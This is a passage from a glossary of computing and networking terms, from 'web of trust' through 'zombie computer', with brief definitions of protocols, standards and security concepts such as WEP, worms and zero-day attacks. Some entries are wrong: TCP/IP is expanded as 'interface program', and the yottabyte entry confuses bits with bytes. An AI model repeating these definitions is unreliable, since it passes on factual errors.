The web of trust is a concept used in PGP, GnuPG, and other OpenPGP-compatible systems to establish the authenticity of the binding between a public key and its owner. Its decentralized trust model is an alternative to the centralized trust model of a public key infrastructure (PKI), which relies exclusively on a certificate authority.
Web server
A web server is a computer system that processes requests via HTTP, the basic network protocol used to distribute information on the World Wide Web. The term web server is used to refer either to the entire system or specifically to the software that accepts and supervises the HTTP requests.
Whois
WHOIS is a query and response protocol that is widely used for querying databases that store the registered users or assignees of an internet resource, such as a domain name, an IP address block, or an autonomous system. The protocol stores and delivers database content in a human-readable format. The WHOIS protocol is documented in RFC 3912.
Windowing system
A windowing system is a system that is used for sharing a computer’s graphical display presentation resources among multiple applications at the same time. A windowing system uses a window manager to keep track of where each window is located on the display screen and its size and status. A windowing system doesn’t just manage the windows but also other forms of graphical user interface entities.
Windowing
Windowing is the process of taking a small subset of a larger dataset for processing and analysis. In the simplest approach, the rectangular window, the dataset is simply truncated before and after the window, while the contents of the window are not modified at all.
Windump
WinDump is a freeware protocol analyzer for Windows that can monitor network traffic on a wire.
Wired equivalent privacy (WEP)
Wired equivalent privacy (WEP) is a security protocol for wireless local area networks defined in the IEEE 802.11b standard. It was introduced as part of the original 802.11 standard ratified in 1997; its intention was to provide data confidentiality comparable to that of a traditional wired network. WEP, recognizable by its key of 10 or 26 hexadecimal digits, was at one time widely in use and was often the first security choice presented to users by router configuration tools.
Wireless application protocol (WAP)
The wireless application protocol (WAP) is a specification for a set of communication protocols to standardize the way that wireless devices, such as cellular telephones and radio transceivers, can be used for internet access, including e-mail, the World Wide Web, newsgroups, and Internet Relay Chat. A WAP browser is a web browser for mobile devices such as mobile phones that uses the protocol.
Wiretapping
Wiretapping is the process of monitoring and recording data that is flowing between two points in a communication system.
World Wide Web (the web, WWW, W3)
The World Wide Web (WWW) is the global, hypermedia-based collection of information and services that is available on internet servers and is accessed by browsers using the hypertext transfer protocol and other information retrieval mechanisms.
Worm
A worm is a computer program that can run independently, can propagate a complete working version of itself onto other hosts on a network, and may consume computer resources destructively.
X.400
X.400 was originally published in 1984 by CCITT and later rewritten in 1988 jointly by ISO and CCITT. X.400 is a standard that conforms to layer 7 of the OSI model and is used for transporting e-mail messages. X.400 is an alternative to the commonly used SMTP standard and includes support for several transport connections, including Ethernet, TCP/IP, and dial-up.
XHTML
XHTML is short for extensible hypertext markup language. XHTML is a hybrid of XML and HTML, designed as a method of displaying web pages on network and portable devices. XHTML was first released on January 26, 2000.
XML
XML is short for extensible markup language. XML is a specification developed by the W3C, starting with the recommendation of February 10, 1998. XML is similar to HTML in that it uses tags to mark up a document, allowing the browser to interpret the tags and display the content on a page. Unlike HTML, XML is unlimited (extensible): it allows self-defined tags that describe the content itself instead of only controlling how a page’s content is displayed. Other languages such as RSS and MathML, and even tools like XSLT, have been created using XML.
XMPP
XMPP, which stands for extensible messaging and presence protocol, is a communications protocol for messaging systems. It is based on XML, storing and transmitting data in that format. It is used for sending and receiving instant messages, maintaining buddy lists, and broadcasting the status of one’s online presence. XMPP is an open protocol standard: anyone can operate their own XMPP service and use it to interact with any other XMPP service. The standard is maintained by the XSF, the XMPP Standards Foundation.
XMT
XMT is also called transmit. XMT is the method of sending data to an alternate computer or device.
XNS
XNS is short for Xerox Network Services. XNS is a proprietary network communications protocol developed by Xerox. XNS is no longer used and has been replaced by transmission control protocol / interface program (TCP/IP).
Y2K
Y2K is short for the year 2000 bug or the millennium bug. Y2K is a warning first published by Bob Bemer in 1971 describing the issues of computers using a two-digit year date stamp.
Ymodem
YMODEM is a file-transfer protocol developed by Chuck Forsberg that is similar to the enhanced 1K version of XMODEM. YMODEM sends data in 1024-byte blocks, allows for multiple file transmissions at once, performs cyclic redundancy checks (CRC), and can reduce the transfer size to compensate for poor connections.
Yottabyte
Yottabyte is abbreviated as YB. A yottabyte is equal to 1,208,925,819,614,629,174,706,176 (2^80) bits, or 1,000,000,000,000,000,000,000,000 (10^24) bytes, and is the largest recognized value used with storage.
Zero day attack
A zero-day (or zero-hour or day-zero) attack is a computer threat that attempts to exploit application vulnerabilities that are undisclosed to the software developer. A zero-day exploit is the actual code that can use such a security hole to carry out an attack. These exploits are used or shared by attackers before the software developer knows about the vulnerability.
Zero day
The zero day, or day zero, is the day a new vulnerability is made known. In some cases, the term zero-day exploit refers to an exploit for which no patch is available yet. Day one is the day on which the patch is made available.
Zombie computer
A zombie computer is a computer connected to the internet that has been compromised by a hacker, a computer virus, or a Trojan horse. Generally, a compromised machine is only one of many in a botnet and is used to perform malicious tasks of one sort or another under remote direction.